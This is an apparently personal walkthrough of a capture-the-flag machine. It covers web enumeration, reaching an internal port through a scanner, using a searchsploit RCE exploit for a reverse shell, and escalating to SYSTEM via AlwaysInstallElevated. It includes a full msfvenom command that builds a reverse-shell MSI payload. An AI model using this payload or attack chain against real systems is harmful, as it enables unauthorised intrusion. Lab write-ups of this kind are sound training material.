Accessing the http site we have nothing, its just a default apache page. If we access the https site we can see a certificate which provides us a subdomain of
Port 5000 is a webpage but we cannot access it. I can use the scanner though to leak whats on the website. I had originally tried the direct IP to port 5000 but got access denied, then I tried localhost on other pages other than port 5000 so I had to cheat and look at 0xdf's walkthrough. Simple mistake.
We can then login to the admin page and we have an RCE exploit which we can find with searchsploit.
We have to edit the script a little bit to go to the proper path and put our IP and creds in. But it works and we get a reverse shell.
We download linpeas and run it, we see alwaysinstallelevated is on. This means we can download a shell and it will be installed as admin
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=9998 -a x64 --platform Windows -f msi -o evil.msi
Upload the evil.msi to the machine and run it and we get system